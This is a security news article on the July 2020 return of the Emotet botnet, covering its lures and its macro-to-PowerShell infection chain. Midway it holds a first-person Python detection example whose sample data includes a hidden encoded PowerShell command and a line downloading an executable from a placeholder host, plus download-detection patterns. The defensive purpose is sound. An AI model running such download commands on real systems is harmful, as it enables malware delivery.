Emotet botnet surges back after months of absence

After months of inactivity, the infamous Emotet trojan has surged back with a new massive spam campaign targeting users worldwide.

The notorious Emotet went dark in February 2020, but it has now surged back with a new massive spam campaign targeting users worldwide.

The Emotet banking trojan has been active since at least 2014; the botnet is operated by a threat actor tracked as TA542.

In 2019, security experts had not detected any activity associated with Emotet since early April, when researchers at Trend Micro uncovered a malware campaign distributing a new Emotet Trojan variant that compromises devices and uses them as proxy C2 servers.

Emotet re-appeared on the threat landscape in August 2019 with an active spam distribution campaign. At the time, Malwarebytes observed that the Trojan had started pumping out spam; the messages initially targeted users in Germany, Poland and Italy, and also the US. The campaign continued targeting users in Austria, Switzerland, Spain, the United Kingdom, and the United States.

Emotet is considered by security experts one of the most active botnets of 2019.

“Today, Emotet suddenly surged back to life with reply-chain, shipping, payment, and invoice spam that deliver malicious Word documents spreadsheets.” states BleepingComputer.

#Emotet AAR for 2020/07/17- Well played Ivan, I dont usually do a Friday report but I did one just for you <3. Actually surprised there were not more changes today in this campaign but it was a lot of the same. I did get some malspam here but it was all filtered. TNW and Be safe! https://t.co/bQvxIwNBpP— Joseph Roosen (@JRoosen) July 18, 2020

Malware researcher Joseph Roosen confirmed that limited activity associated with the botnet was observed earlier this week, when botnet operators were using weaponized documents employing old URLs.

Roosen added that the Emotet botnet is now spewing forth massive amounts of spam employing new URLs pointing to compromised WordPress sites.

According to researchers from Cofense Labs, most of the recent spam messages use the subject ‘Jobs GO,’ while a few use “Expedia Payment Remittance Advice” or requests for W-9 templates.

Other samples analyzed by the researchers use bait documents that pose as a shipping document from Loomis-express.com.

Researchers from Cryptolaemus, a group of experts focused on analyzing Emotet, also confirmed Emotet’s resurrection. Other research groups observed the botnet’s resurgence as well:

Looks like Emotet is back in town https://t.co/fkDITyH9GT https://t.co/7DgiwZQlJN — abuse.ch (@abuse_ch) July 17, 2020

Emotet resurfaced in a massive campaign today after being quiet for several months. The new campaign sports longtime Emotet tactics: emails carrying links or documents w/ highly obfuscated malicious macros that run a PowerShell script to download the payload from 5 download links pic.twitter.com/FZJqDCJQGV — Microsoft Security Intelligence (@MsftSecIntel) July 17, 2020

#Emotet spinning up their business. New spam modules being pushed and new spamwaves coming in from both Epoch 2 and 3. Either attached a doc or a mallink. Current Emotet tier-1 C&C geolocation attached. pic.twitter.com/vUTuf9v0GM — peterkruse (@peterkruse) July 17, 2020

Researchers from MalwareBytes also published a post containing details of the Emotet activity recently observed.

“It was never a question of “if” but “when”. After five months of absence, the dreaded Emotet has returned. Following several false alarms over the last few weeks, a spam campaign was first spotted on July 13 showing signs of a likely comeback.” reads the post published by MalwareBytes.

“The Emotet botnets started pushing malspam actively on Friday, July 17, using the same techniques as it employed previously. Malicious emails contain either a URL or an attachment.”

Upon enabling the macro, WMI launches PowerShell to retrieve the bot binary from one of the remote compromised websites.
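The macro-to-WMI-to-PowerShell chain described above is what a defender would hunt for in process-creation telemetry. The following is an added detection example of my own, not code from the post or from Malwarebytes: it scans a list of process-creation events and flags PowerShell whose parent is the WMI provider host (the launch path the article describes) or an Office application directly, scoring the command line for download-style arguments. The event schema and sample events are constructed for the example.

```python
import re

# Constructed event schema (assumption, not a real product's fields):
# pid, ppid, image (full path), cmd (command line), roughly Sysmon Event ID 1 style.
OFFICE_APPS = {"winword.exe", "excel.exe"}
WMI_HOST = "wmiprvse.exe"  # Win32_Process.Create spawns children under this host
# Argument patterns common to macro downloaders: encoded/hidden flags and URLs.
SUSPICIOUS_ARGS = re.compile(
    r"(-enc\w*|-w(indowstyle)?\s+hidden|downloadstring|https?://)", re.I
)

# Constructed sample telemetry: one WMI-launched PowerShell, one launched
# directly by Word, and one benign PowerShell started from Explorer.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": r'WINWORD.EXE /n "C:\Users\alice\Downloads\invoice.doc"'},
    {"pid": 300, "ppid": 1, "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "cmd": "WmiPrvSE.exe"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -enc SQBFAFgA"},  # constructed, truncated blob
    {"pid": 500, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -c "Invoke-WebRequest http://example.invalid/a.exe -OutFile a.exe"'},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell Get-ChildItem"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_macro_chains(events):
    """Return findings for PowerShell spawned by the WMI host or by an Office app.

    Because the macro calls WMI, PowerShell's parent is WmiPrvSE.exe rather than
    WINWORD.EXE, which is exactly why the WMI-host parent is treated as a signal.
    Score = 1 for the parent relationship + 1 per suspicious argument pattern.
    """
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) != "powershell.exe":
            continue
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        if pname == WMI_HOST or pname in OFFICE_APPS:
            score = 1 + len(SUSPICIOUS_ARGS.findall(e["cmd"]))
            findings.append({"pid": e["pid"], "parent": pname, "score": score})
    return findings
```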

The news that Emotet is back is alarming for security experts: the operators behind the threat have also used their botnet to deliver other threats. For this reason, it is very important to share any information related to recent attacks to prevent them from targeting organizations worldwide.


Pierluigi Paganini

(SecurityAffairs – hacking, botnet)

The post Emotet botnet surges back after months of absence appeared first on Security Affairs.